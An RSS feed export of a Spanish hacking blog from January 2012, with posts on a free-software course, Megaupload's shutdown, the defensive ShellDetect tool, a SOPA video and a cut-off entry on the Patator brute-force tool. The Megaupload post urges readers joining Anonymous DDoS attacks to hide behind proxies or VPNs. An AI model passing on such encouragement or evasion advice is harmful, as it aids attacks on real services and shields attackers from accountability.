<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2enclosuresfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:media="http://search.yahoo.com/mrss/" xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><title>Blackploit [PenTest]</title><link>http://www.blackploit.com/</link><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/Hacking-blackploit" /><description>&lt;center&gt; 3l Conocimiento Debe Ser Libr3! &lt;/center&gt;</description><language>en</language><managingEditor>noreply@blogger.com (Zion3R)</managingEditor><lastBuildDate>Sat, 28 Jan 2012 17:23:58 PST</lastBuildDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">438</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">25</openSearch:itemsPerPage><feedburner:info uri="hacking-blackploit" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><media:category scheme="http://www.itunes.com/dtds/podcast-1.0.dtd">Religion &amp; Spirituality/Islam</media:category><creativeCommons:license>http://creativecommons.org/licenses/by/2.0/</creativeCommons:license><feedburner:emailServiceId>Hacking-blackploit</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><item><title>Curso Completo Software Libre</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/01tNu3qbnPo/curso-completo-software-libre.html</link><category>Tutoriales</category><category>Linux OS</category><category>Textos</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sat, 28 Jan 2012 17:23:58 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2586101784975272855</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-gDNlRhRnjbk/TySfh5N51bI/AAAAAAAAAek/ttloFhU84-Y/s1600/Software_libre.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="108" src="http://4.bp.blogspot.com/-gDNlRhRnjbk/TySfh5N51bI/AAAAAAAAAek/ttloFhU84-Y/s320/Software_libre.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En &lt;a href="http://www.tuxapuntes.com/" target="_blank"&gt;&lt;strong&gt;Tuxapuntes&lt;/strong&gt;&lt;/a&gt;&amp;nbsp;han publicado un conjunto de manuales sobre &lt;strong&gt;Software Libre&lt;/strong&gt; muy completos que nos dará una amplia noción&amp;nbsp;sobre GNU/Linux, Bases de datos, redes, etc...&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El Curso se divide en partes (12) las cuales son bastante extensas, pero muy detalladas y claras. Sin duda vale la pena darse un tiempo para leerlos, o si no simplemente leer el tema que más nos interese.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Aquí el Index con los 12 temas (15 PDFs), hacer clic para descargar cada cual:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/001%20Introduccion%20al%20software%20libre.pdf" target="_blank"&gt;&lt;strong&gt;1. Introducción al software libre.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/002%20Sistema%20operativo%20gnu%20linux%20basico.pdf" target="_blank"&gt;&lt;strong&gt;2. Sistema operativo gnu/linux básico.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/003%20Administracion%20avanzada%20del%20sistema%20operativo%20linux.pdf" target="_blank"&gt;&lt;strong&gt;3. Administración avanzada de GNU/Linux.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/004%20Desarrollo%20de%20aplicaciones%20web.pdf" target="_blank"&gt;&lt;strong&gt;4. Desarrollo de aplicaciones web.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/005%20Utilidades%20y%20herramientas.pdf" target="_blank"&gt;&lt;strong&gt;5. Utilidades y herramientas.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/006%20Aspectos%20legales%20V1.pdf" target="_blank"&gt;&lt;strong&gt;6. a. Aspectos legales y de explotación del software libre Parte I.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/006%20Aspectos%20legales%20V2.pdf" target="_blank"&gt;&lt;strong&gt;6. b. Aspectos legales y de explotación del software libre parte II.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/007%20Bases%20de%20datos.pdf" target="_blank"&gt;&lt;strong&gt;7. Bases de Datos&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;.&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/008%20Implatacion%20de%20sistemas.pdf" target="_blank"&gt;&lt;strong&gt;8. Implantación de sistemas en gnu/linux.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/009%20Ingenieria%20del%20software.pdf" target="_blank"&gt;&lt;strong&gt;9. Ingeniería del software en entornos de SL.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/010%20Introduccion%20al%20desarrollo%20de%20software.pdf" target="_blank"&gt;&lt;strong&gt;10. Introduccion al desarrollo de software.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/011%20Redes%20computacionales_0.pdf" target="_blank"&gt;&lt;strong&gt;11. Redes computacionales.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://tuxapuntes.com/sites/default/files/012.1%20Aspectos%20avanzados%20en%20seguridad%20en%20redes%20modulos.pdf" target="_blank"&gt;&lt;strong&gt;12-1. Aspectos avanzados de seguridad en redes.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/012.2%20Aspectos%20avanzados%20en%20seguridad%20en%20redes%20apendice%20GFDL.pdf" target="_blank"&gt;&lt;strong&gt;12-2. Apéndice: GNU Free Documentation License.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tuxapuntes.com/sites/default/files/012.3%20Aspectos%20avanzados%20en%20seguridad%20en%20redes%20apendice.pdf" target="_blank"&gt;&lt;strong&gt;12-3. Apéndice: Aspectos avanzados en seguridad en redes.&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Si&amp;nbsp;desean más información pueden ir al index oficial: &lt;a href="http://www.tuxapuntes.com/node/177" target="_blank"&gt;http://www.tuxapuntes.com/node/177&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Si prefieren pueden descargar todos el curso Completo (los 15 PDFs)&amp;nbsp;directamente desde aquí:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;strong&gt;&lt;span style="font-size: large;"&gt;Download Curso Completo Software Libre&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;script type="text/javascript"&gt;
&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 250 x 250 */
google_ad_slot = "9258007445";
google_ad_width = 250;
google_ad_height = 250;
//--&gt;
&lt;/script&gt;
&lt;script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"&gt;
&lt;/script&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-2586101784975272855?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/O-1UKgSVugVaKQS1Fp1_Z__aYbw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/O-1UKgSVugVaKQS1Fp1_Z__aYbw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/O-1UKgSVugVaKQS1Fp1_Z__aYbw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/O-1UKgSVugVaKQS1Fp1_Z__aYbw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/01tNu3qbnPo" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-28T22:23:58.693-03:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-gDNlRhRnjbk/TySfh5N51bI/AAAAAAAAAek/ttloFhU84-Y/s72-c/Software_libre.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2012/01/curso-completo-software-libre.html</feedburner:origLink></item><item><title>Megaupload DOWN!</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/ea7ndrsoVM8/megaupload-down.html</link><category>DDoS</category><category>Noticias</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Fri, 20 Jan 2012 12:00:07 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-1747800722498718318</guid><description>&lt;div style="text-align: justify;"&gt;
Como ya se habrán dado cuenta el FBI cerró MEGAUPLOAD, un paso más a la hostilidad y a la censura de un Internet libre... Mucho se puede decir, y poco se puede hacer, ataques DDoS no son suficientes si creen que con eso se logra algo...&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-18ZVa1WbfYY/TxnFMn1R88I/AAAAAAAAAeU/TDn_y_atD-8/s1600/megaupload-DOWN.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="353" src="http://4.bp.blogspot.com/-18ZVa1WbfYY/TxnFMn1R88I/AAAAAAAAAeU/TDn_y_atD-8/s640/megaupload-DOWN.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Muchos archivos de &lt;a href="http://www.blackploit.com/"&gt;Blackploit.com&lt;/a&gt; estaban hospeados en Megaupload, intentaré arreglarlos en breve, pero no será extraño que&amp;nbsp;empiecen&amp;nbsp;a votar otros servicios de descargas...&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Si deciden ayudar a &lt;b&gt;Anonymous&lt;/b&gt; en los &lt;b&gt;ataques DDoS&lt;/b&gt; por favor usen buenas &lt;b&gt;proxys&lt;/b&gt; o &lt;b&gt;VPNs&lt;/b&gt; como corresponde.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
3l Conocimiento Debe Ser Libr3!&lt;/div&gt;
&lt;br /&gt;
[+]&amp;nbsp;Salu2&lt;br /&gt;
[+]&amp;nbsp;Zion3R&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-1747800722498718318?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/wml1Ngs0QuUbl9XBO0Pp8aIDw6Q/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wml1Ngs0QuUbl9XBO0Pp8aIDw6Q/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/wml1Ngs0QuUbl9XBO0Pp8aIDw6Q/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wml1Ngs0QuUbl9XBO0Pp8aIDw6Q/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/ea7ndrsoVM8" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-20T17:00:07.744-03:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-18ZVa1WbfYY/TxnFMn1R88I/AAAAAAAAAeU/TDn_y_atD-8/s72-c/megaupload-DOWN.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2012/01/megaupload-down.html</feedburner:origLink></item><item><title>[ShellDetect v1.0] Herramienta para detección de Shell Codes</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/_gxye-U9QzU/shelldetect-v10-herramienta-para.html</link><category>Herramientas</category><category>Hack T00LZ</category><category>Seguridad</category><category>Python</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sun, 15 Jan 2012 18:18:23 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-1158696171268204443</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-2zkSdRgIjqQ/TxOD5VHYgzI/AAAAAAAAAeM/ENGoKuCeuPI/s1600/shell-detect.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="164" src="http://2.bp.blogspot.com/-2zkSdRgIjqQ/TxOD5VHYgzI/AAAAAAAAAeM/ENGoKuCeuPI/s320/shell-detect.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Shell Detect&lt;/b&gt; es una herramienta desarrollada por &lt;a href="http://securityxploded.com/contributors.php#Amit_Malik" target="_blank"&gt;&lt;b&gt;Amit Malik&lt;/b&gt;&lt;/a&gt; para detectar la presencia de&amp;nbsp; &lt;a href="http://es.wikipedia.org/wiki/Shellcode" target="_blank"&gt;&lt;b&gt;Shell Codes&lt;/b&gt;&lt;/a&gt; dentro de un archivo o de un tráfico de red. Con ella se pueden analizar binarios (como los generados por &lt;i&gt;Metasploit&lt;/i&gt; por ejemplo) o archivos en un flujo de red (capturando el tráfico con &lt;i&gt;tcpdump/wireshark&lt;/i&gt;).&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;Hoy en día&lt;/span&gt; &lt;span class="hps"&gt;los atacantes&lt;/span&gt; &lt;span class="hps"&gt;distribuyen&lt;/span&gt; &lt;span class="hps"&gt;archivos maliciosos&lt;/span&gt; &lt;span class="hps"&gt;que contienen&lt;/span&gt;&lt;span class="hps"&gt; &lt;/span&gt;&lt;/span&gt;Shell Codes&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt; ocultos&lt;/span&gt;&lt;span class="hps"&gt;&lt;/span&gt;. &lt;span class="hps"&gt;Al abrir&lt;/span&gt; &lt;span class="hps"&gt;estos archivos,&lt;/span&gt; &lt;span class="hps"&gt;el &lt;/span&gt;&lt;/span&gt;Shell Code&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;&lt;/span&gt; &lt;span class="hps"&gt;se ejecutan&lt;/span&gt; &lt;span class="hps"&gt;en silencio&lt;/span&gt;, lo que compromete la integridad del&lt;span class="hps"&gt; sistema.&lt;/span&gt; &lt;span class="hps"&gt;Esto es más peligroso&lt;/span&gt; &lt;span class="hps"&gt;cuando la&lt;/span&gt; &lt;span class="hps"&gt;explotación&lt;/span&gt; &lt;span class="hps atn"&gt;es &lt;b&gt;"&lt;/b&gt;&lt;/span&gt;&lt;b&gt;Zero Day"&lt;/b&gt;, ya que no &lt;span class="hps"&gt;será detectado por&lt;/span&gt; &lt;span class="hps"&gt;la firma&lt;/span&gt; &lt;span class="hps"&gt;tradicional&lt;/span&gt; del&lt;span class="hps"&gt; anti-virus&lt;/span&gt;. &lt;span class="hps"&gt;En estos casos&lt;/span&gt; &lt;span class="hps"&gt;ShellDetect&lt;/span&gt; ayuda&lt;span class="hps"&gt; a&lt;/span&gt; &lt;span class="hps"&gt;identificar la presencia de&lt;/span&gt; &lt;/span&gt;Shell Codes&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;&lt;/span&gt; &lt;span class="hps"&gt;y ayudará en la tarea de &lt;/span&gt;&lt;span class="hps"&gt;mantener el sistema seguro&lt;/span&gt;&lt;span class=""&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class=""&gt;Para correr ShellDetect es necesario instalar &lt;a href="http://www.python.org/download/" target="_blank"&gt;Python&lt;/a&gt;, además se recomienda correrla &lt;/span&gt;&lt;/span&gt;en una máquina virtual (&lt;i&gt;Vmware/VirtualBox&lt;/i&gt;) ya que la herramienta todavía está muy beta y aun se le escapan Shell Codes más avanzadas, pero lo importante es que detecta las de &lt;i&gt;Metasploit &lt;/i&gt;que son las más usadas.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class=""&gt; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class=""&gt;&amp;nbsp;El uso de la herramienta es muy fácil (y por ahora simplemente corre bajo &lt;i&gt;Windows XP&lt;/i&gt;), simplemente se usa en la consola: &lt;/span&gt;&lt;/span&gt;&lt;b&gt;ShellDetect.py file_name&lt;/b&gt; y analiza el archivo o el tráfico de red capturado.&lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-2IzdqgiVWE0/TxOC7Q3VTeI/AAAAAAAAAeE/fH2udDuC1fo/s1600/shelldetect_screen_big.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="380" src="http://2.bp.blogspot.com/-2IzdqgiVWE0/TxOC7Q3VTeI/AAAAAAAAAeE/fH2udDuC1fo/s640/shelldetect_screen_big.jpg" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Analizando primero un archivo (pgeneric-12.txt), después un tráfico de red capturado (network_stream).&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;Como dije arriba, la herramienta está en beta, pero la encuentro muy útil y le veo bastante futuro.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Más información:&lt;/b&gt; &lt;a href="http://securityxploded.com/shell-detect.php" target="_blank"&gt;http://securityxploded.com/shell-detect.php&lt;/a&gt;&lt;br /&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 250 x 250 */
google_ad_slot = "9258007445";
google_ad_width = 250;
google_ad_height = 250;
//--&gt;
&lt;/script&gt;&lt;br /&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;br /&gt;
&lt;a href="http://securityxploded.net/getfile.php?file=ShellDetect.zip"&gt;&lt;span style="font-size: large;" target="_blank"&gt;&lt;b&gt;Descarga ShellDetect v1.0&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R&lt;br /&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-1158696171268204443?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Suiyg5dmNslRo-6Pxt0lk1qauNc/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Suiyg5dmNslRo-6Pxt0lk1qauNc/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Suiyg5dmNslRo-6Pxt0lk1qauNc/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Suiyg5dmNslRo-6Pxt0lk1qauNc/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/_gxye-U9QzU" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-15T23:18:23.649-03:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-2zkSdRgIjqQ/TxOD5VHYgzI/AAAAAAAAAeM/ENGoKuCeuPI/s72-c/shell-detect.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2012/01/shelldetect-v10-herramienta-para.html</feedburner:origLink></item><item><title>[Vídeo] Explicación de la ley SOPA y porqué hay que DETENERLA!</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/hiRQoyF7wCg/video-explicacion-de-la-ley-sopa-y.html</link><category>Video</category><category>Blackploit</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sun, 08 Jan 2012 16:12:12 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2869153114031988282</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/--k_04nXB4lk/TwoJh5hHZwI/AAAAAAAAAd0/bAMJXRlbT8M/s1600/ley-sopa.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="145" src="http://4.bp.blogspot.com/--k_04nXB4lk/TwoJh5hHZwI/AAAAAAAAAd0/bAMJXRlbT8M/s200/ley-sopa.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Simplemente un vídeo imperdible donde explican (&lt;strike&gt;for dummies&lt;/strike&gt;) la implicancias desastrosas de la ley SOPA en la libertad no sólo de internet, si no también de cada individuo y las ventajas para la empresas de la mafia de contenido. Dejo el vídeo:&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/5fvwoHKj6cs" width="640"&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* Bloque 1 */
google_ad_slot = "7923710689";
google_ad_width = 468;
google_ad_height = 60;
//--&gt;
&lt;/script&gt;&lt;br /&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;br /&gt;
&amp;nbsp;&lt;span style="font-size: large;"&gt;NO a la ley SOPA!&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;3l Conocimiento Debe Ser Libr3! &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Via: &lt;a href="http://blog.segu-info.com.ar/2012/01/explicacion-de-la-ley-sopa-en-video-y.html"&gt;http://blog.segu-info.com.ar/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-2869153114031988282?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/PoszJb1zgCXsYUIoh_auXazRS_4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PoszJb1zgCXsYUIoh_auXazRS_4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/PoszJb1zgCXsYUIoh_auXazRS_4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PoszJb1zgCXsYUIoh_auXazRS_4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/hiRQoyF7wCg" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-08T21:12:12.047-03:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/--k_04nXB4lk/TwoJh5hHZwI/AAAAAAAAAd0/bAMJXRlbT8M/s72-c/ley-sopa.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2012/01/video-explicacion-de-la-ley-sopa-y.html</feedburner:origLink></item><item><title>[Patator] Herramienta Multi-Propósito para Fuerza Bruta</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/iP8oT7vI3mc/patator-herramienta-multi-proposito.html</link><category>Herramientas</category><category>Hack T00LZ</category><category>Brute Force</category><category>Fuerza Bruta</category><category>Python</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Wed, 04 Jan 2012 17:42:08 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-410422475037270260</guid><description>&lt;div style="text-align: justify;"&gt;
